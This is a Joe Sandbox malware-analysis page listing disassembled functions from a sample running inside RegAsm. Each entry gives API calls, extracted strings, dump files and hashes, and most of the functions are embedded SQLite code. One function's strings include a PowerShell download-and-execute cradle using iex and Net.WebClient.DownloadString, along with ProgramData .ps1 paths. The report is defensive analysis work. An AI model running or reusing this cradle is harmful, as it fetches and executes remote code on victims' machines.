Function 1B72BCF0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

PRAGMA %Q.page_size, xrefs: 1B72BD03
SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1, xrefs: 1B72BD67
undersize RTree blobs in "%q_node", xrefs: 1B72BDA1

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: PRAGMA %Q.page_size$SELECT length(data) FROM '%q'.'%q_node' WHERE nodeno = 1$undersize RTree blobs in "%q_node"
API String ID: 0-3485589083
Opcode ID: 796e2e8ca23c381326c6bbec83aa7eb9d059d6118a16d3dbc578d43bf08ff99d
Instruction ID: 395010a56e28501811696de753087ea2323cc5e0a9b88c38fa87d390c7caaea4
Opcode Fuzzy Hash: 796e2e8ca23c381326c6bbec83aa7eb9d059d6118a16d3dbc578d43bf08ff99d
Instruction Fuzzy Hash: 723101F1A40212AFDB048F24DC85AEAB3F8EB44716F0401A6FD49D6311E736E958CBE1

Function 00411188 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000001), ref: 0041119D
GetDeviceCaps.GDI32(00000000,00000008), ref: 004111A8
GetDeviceCaps.GDI32(00000000,0000000A), ref: 004111B3
ReleaseDC.USER32(00000000,00000000), ref: 004111BE
GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,?,004160EE,?,00000000,?,Display Resolution: ,00000000,?,004277F0,00000000,?), ref: 004111CA
HeapAlloc.KERNEL32(00000000,?,00000000,?,?,004160EE,?,00000000,?,Display Resolution: ,00000000,?,004277F0,00000000,?,00000000), ref: 004111D1
wsprintfA.USER32 ref: 004111E3

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Strings

%dx%d, xrefs: 004111DD

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: 6b3a9271b659d38bc6f9758ef7b6618ae4811ec0de7a721b5e74bf37eacd1b5d
Instruction ID: 362ef291c8d2e0918a789945f0526d92947b659a326dae23e2a11bbba191b05b
Opcode Fuzzy Hash: 6b3a9271b659d38bc6f9758ef7b6618ae4811ec0de7a721b5e74bf37eacd1b5d
Instruction Fuzzy Hash: 5DF0D13A601220BBD7205BA1DC4DDDF7F7EEF4BBA5B000011FB0597250CA744A80CBA1

Function 1B7832F0 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 464COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7836B8, 1B7836FD, 1B78375D, 1B78380E
%s at line %d of [%.10s], xrefs: 1B7836C7, 1B78370C, 1B78376C, 1B78381D
database corruption, xrefs: 1B7836C2, 1B783707, 1B783767, 1B783818

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: c11623e58a1136488fdc3c65470f536b3658eb0e29bd28274739cb008b7c5dd7
Instruction ID: 71fc9a8aab74d129de4620c7f597f5b605b3a81d22e9ac96c4b1a2c04687cd4b
Opcode Fuzzy Hash: c11623e58a1136488fdc3c65470f536b3658eb0e29bd28274739cb008b7c5dd7
Instruction Fuzzy Hash: E5F15670A047529FD700DF2DC8C4AEABBE0FF44615F454169F8888B662E335E95AC7A1

Function 1B699700 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

(FK), xrefs: 1B6998D3

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: (FK)
API String ID: 0-1642768157
Opcode ID: 55defdb5d59891eef840411d4b9768ab00bf27c63a5d3701c0ac2f7e5b8f8513
Instruction ID: 4bc1617295bd520bbd0fdbaf3bcc434e21fddfce5614b75c002cf52316b0cd5f
Opcode Fuzzy Hash: 55defdb5d59891eef840411d4b9768ab00bf27c63a5d3701c0ac2f7e5b8f8513
Instruction Fuzzy Hash: A881E3B67052019FEB049F28FC40BA6B3A1FB85235F24466EF546CB6E1EB32E510CB50

Function 1B6AEB00 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6AECCB
%s at line %d of [%.10s], xrefs: 1B6AECDA
%.*s%s, xrefs: 1B6AEC88
database corruption, xrefs: 1B6AECD5

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %.*s%s$%s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-894757972
Opcode ID: 75998b578658a7af4e2e1642aaeb610b183d8ce2281e4946c112c56cbffc6e8b
Instruction ID: d48b0551c82444bf2b98e513eebf3ab258376127a790a43d306a5975bafbef76
Opcode Fuzzy Hash: 75998b578658a7af4e2e1642aaeb610b183d8ce2281e4946c112c56cbffc6e8b
Instruction Fuzzy Hash: A2611FB4A043418BCB14CF24CD81AEBB7E2AF98700F24496CF89A9B340E731ED45CB91

Function 0041237B Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 169COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412380

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

ShellExecuteEx.SHELL32(?), ref: 00412544

Strings

')", xrefs: 00412481
.ps1, xrefs: 00412433
C:\ProgramData\, xrefs: 004123C2
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 0041245D
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 004124C6

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 416170631-1989157005
Opcode ID: 8d675afc14cc62a0c1ba82dbf6450172f6168594811f9f228a98776fff0139b8
Instruction ID: 2317cddda8ff2502209b036727239b083d757f9d95c555f692b17e0c1ab20cb7
Opcode Fuzzy Hash: 8d675afc14cc62a0c1ba82dbf6450172f6168594811f9f228a98776fff0139b8
Instruction Fuzzy Hash: 9B619471C05248EEDB05EBE5D995BDEBBB4AF18308F50419EE01563182DFB82BC8CB65

Function 1B739030 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 169COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B73904F, 1B739182, 1B7391B9, 1B7391E4
%s at line %d of [%.10s], xrefs: 1B73905E, 1B739191, 1B7391C8, 1B7391F3
database corruption, xrefs: 1B739059, 1B73918C, 1B7391C3, 1B7391EE

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 29fbedab53fcf9526cae8193b86cac43ec31a6df647dde8fdfc59af5a0e1c8f0
Instruction ID: 68a8a80ec2876f098db441e4400edbf3b68c06c2130afaf1028266749b1e5725
Opcode Fuzzy Hash: 29fbedab53fcf9526cae8193b86cac43ec31a6df647dde8fdfc59af5a0e1c8f0
Instruction Fuzzy Hash: BF510475709340ABC300DA28CC84AEFB7E1FB88616F944869F58AD7762E336E585C761

Function 1B689DA0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

[%!g,%!g]], xrefs: 1B689EC0
[%!g,%!g],, xrefs: 1B689E7E

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: [%!g,%!g],$[%!g,%!g]]
API String ID: 0-3388633204
Opcode ID: 78f135c4e0275045d8cc3a95f2fc58c3ef3cd6dce65955fdc0bff0847124181c
Instruction ID: d592a2a482e0936d77aca4e167666fad4a9be82446c1de2c9ee9841e0547e575
Opcode Fuzzy Hash: 78f135c4e0275045d8cc3a95f2fc58c3ef3cd6dce65955fdc0bff0847124181c
Instruction Fuzzy Hash: CE5123B09007169BDB10DF69CCC5BDBB7B4AF56710F008629F84D9B280E771E489CBA2

Function 1B6AF330 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');, xrefs: 1B6AF33F
unable to validate the inverted index for FTS%d table %s.%s: %s, xrefs: 1B6AF418
malformed inverted index for FTS%d table %s.%s, xrefs: 1B6AF3F3

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');$malformed inverted index for FTS%d table %s.%s$unable to validate the inverted index for FTS%d table %s.%s: %s
API String ID: 0-2809892521
Opcode ID: ceaa173bcd6099b747c0b642b384223497e605d849435d6d5c82d8c7675e6975
Instruction ID: 5ff9fcd67aea7b9ade4d49559afc346846139592736c7b77298015146cf8111a
Opcode Fuzzy Hash: ceaa173bcd6099b747c0b642b384223497e605d849435d6d5c82d8c7675e6975
Instruction Fuzzy Hash: 1441D4F29812229BDB14EF39DC89AEB37ACEF50A65F04442AFC45C2181D731D559CBE2

Function 1B6A30F0 Relevance: 12.2, APIs: 8, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef9bc361ae3474b21639a132a58aba64f028cb6e51941eb5dbb3e3cd302f48cd
Instruction ID: 54d11bd53e9125da080c6790b20866bb34bdd7e78ba4e2467693c41cef626245
Opcode Fuzzy Hash: ef9bc361ae3474b21639a132a58aba64f028cb6e51941eb5dbb3e3cd302f48cd
Instruction Fuzzy Hash: AD5180B6608200AFDB41EB68FC45EEA7BE2EF85320F1945A8F158872B5E231DD519B41

Function 0041755C Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00417561
lstrcat.KERNEL32(?,?), ref: 004175B7

Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A

lstrcat.KERNEL32(?,00000000), ref: 004175DD
lstrcat.KERNEL32(?,?), ref: 004175FD
lstrcat.KERNEL32(?,?), ref: 00417611
lstrcat.KERNEL32(?), ref: 00417624
lstrcat.KERNEL32(?,?), ref: 00417638
lstrcat.KERNEL32(?), ref: 0041764B

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00417295: _EH_prolog.MSVCRT ref: 0041729A
Part of subcall function 00417295: GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 004172B2
Part of subcall function 00417295: HeapAlloc.KERNEL32(00000000,?,00000104), ref: 004172B9
Part of subcall function 00417295: wsprintfA.USER32 ref: 004172D1
Part of subcall function 00417295: FindFirstFileA.KERNEL32(?,?), ref: 004172E8
Part of subcall function 00417295: StrCmpCA.SHLWAPI(?,004279AC), ref: 00417305
Part of subcall function 00417295: StrCmpCA.SHLWAPI(?,004279B0), ref: 0041731F
Part of subcall function 00417295: wsprintfA.USER32 ref: 00417343

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 2058169020-0
Opcode ID: cd6bacedc1c3f9e2ca678f00183ebfccc2edba9b423ac6a884286efef3b30afc
Instruction ID: 9416cb0eeec3f2734b8d70144bef72cc8765a0d5c73c38ad71a129afe7317496
Opcode Fuzzy Hash: cd6bacedc1c3f9e2ca678f00183ebfccc2edba9b423ac6a884286efef3b30afc
Instruction Fuzzy Hash: 0041BBB6901119AACB11EBB1EC49EDE77BCAB09314F0045A6F605E3152EA38D7C88F64

Function 1B69B6E0 Relevance: 12.1, APIs: 8, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a265d1254bd6bd74b5c8ada244088b9beb4dac5d55d0f9f3bf7583aeefbdbe
Instruction ID: 17daa2cb372d90f17861a6005800fbb0cc31d8704d42ef19f8c21e06dea2b38d
Opcode Fuzzy Hash: 25a265d1254bd6bd74b5c8ada244088b9beb4dac5d55d0f9f3bf7583aeefbdbe
Instruction Fuzzy Hash: 6E11CBF9905300BFDE049B15EC42EAB77B9EFA5700F840558F849CB220E736E919D6A7

Function 1B6F7920 Relevance: 10.8, APIs: 7, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c0a64c567377825aa826e38cd61e7aab24cd6bc2d57a6723dcf8eefeade29f
